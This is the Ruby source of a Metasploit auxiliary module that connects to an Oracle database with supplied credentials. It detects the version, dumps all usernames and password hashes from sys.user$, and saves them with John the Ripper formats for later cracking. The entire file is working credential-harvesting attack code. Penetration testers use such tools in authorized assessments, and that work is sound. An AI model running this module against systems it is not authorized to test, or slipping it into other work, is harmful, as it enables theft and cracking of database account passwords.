metasploit-framework/modules/auxiliary/scanner/oracle/oracle_hashdump.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::ORACLE
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name'           => 'Oracle Password Hashdump',
      'Description'    => %Q{
          This module dumps the usernames and password hashes
          from Oracle given the proper Credentials and SID.
          These are then stored as creds for later cracking using auxiliary/analyze/jtr_oracle_fast.
          This module supports Oracle DB versions 8i, 9i, 10g, 11g, and 12c.
      },
      'Author'         => ['theLightCosine'],
      'License'        => MSF_LICENSE
    )
  end

  def run_host(ip)
    return if not check_dependencies

    # Checks for Version of Oracle. Behavior varies with oracle version.
    # 12c uses SHA-512 (explained in more detail in report_hashes() below)
    # 11g uses SHA-1 while 8i-10g use DES
    query =  'select * from v$version'
    ver = prepare_exec(query)

    if ver.nil?
      print_error("An error has occurred while querying for the Oracle version. Please check your OPTIONS")
      return
    end

    unless ver.empty?
      case
      when ver[0].include?('8i')
        ver='8i'
      when ver[0].include?('9i')
        ver='9i'
      when ver[0].include?('10g')
        ver='10g'
      when ver[0].include?('11g')
        ver='11g'
      when ver[0].include?('12c')
        ver='12c'
      when ver[0].include?('18c')
        print_error("Version 18c is not currently supported")
        return
      else
        print_error("Error: Oracle DB version not supported.\nThis module supports Oracle DB versions 8i, 9i, 10g, 11g, and 12c.\nDumping unsupported version info:\n#{ver[0]}")
        return
      end
      vprint_status("Server is running version #{ver}")
    end

    this_service = report_service(
          :host  => datastore['RHOST'],
          :port => datastore['RPORT'],
          :name => 'oracle',
          :proto => 'tcp'
          )

    tbl = Rex::Text::Table.new(
      'Header'  => 'Oracle Server Hashes',
      'Indent'   => 1,
      'Columns' => ['Username', 'Hash']
    )

    begin
      case ver
      when '8i', '9i', '10g'    # Get the usernames and hashes for 8i-10g
        query='SELECT name, password FROM sys.user$ where password is not null and name<> \'ANONYMOUS\''
        results= prepare_exec(query)
        unless results.empty?
          results.each do |result|
            row= result.split(/,/)
            tbl << row
          end
        end
      when '11g', '12c'    # Get the usernames and hashes for 11g or 12c
        query='SELECT name, spare4 FROM sys.user$ where password is not null and name<> \'ANONYMOUS\''
        results= prepare_exec(query)
        #print_status("Results: #{results.inspect}")
        unless results.empty?
          results.each do |result|
            row= result.split(/,/)
            next unless row.length == 2
            tbl << row
          end
        end
      end
    rescue => e
      print_error("An error occurred. The supplied credentials may not have proper privileges")
      return
    end
    print_status("Hash table :\n #{tbl}")
    report_hashes(tbl, ver, ip, this_service)
  end

  # Save each row in the hash table as credentials (shown by "creds" command)
  # This is done slightly differently, depending on the version
  def report_hashes(table, ver, ip, service)

    # Before module jtr_oracle_fast cracks these hashes, they are converted (based on jtr_format)
    # to a format that John The Ripper can handle. This format is stored here.
    case ver
    when '8i', '10g'
      jtr_format = "des,oracle"
    when '11g'
      jtr_format = "raw-sha1,oracle11"
    when '12c'
      jtr_format = "oracle12c"
    end

    service_data = {
      address: Rex::Socket.getaddress(ip),
      port: service[:port],
      protocol: service[:proto],
      service_name: service[:name],
      workspace_id: myworkspace_id
    }

    # For each row in the hash table, save its corresponding credential data and JTR format
    table.rows.each do |row|
      credential_data = {
        origin_type: :service,
        module_fullname: self.fullname,
        username: row[0],
        private_data: row[1],
        private_type: :nonreplayable_hash,
        jtr_format: jtr_format
      }

      credential_core = create_credential(credential_data.merge(service_data))

      login_data = {
        core: credential_core,
        status: Metasploit::Model::Login::Status::UNTRIED
      }

      create_credential_login(login_data.merge(service_data))
    end
    print_good("Hash Table has been saved")
  end

end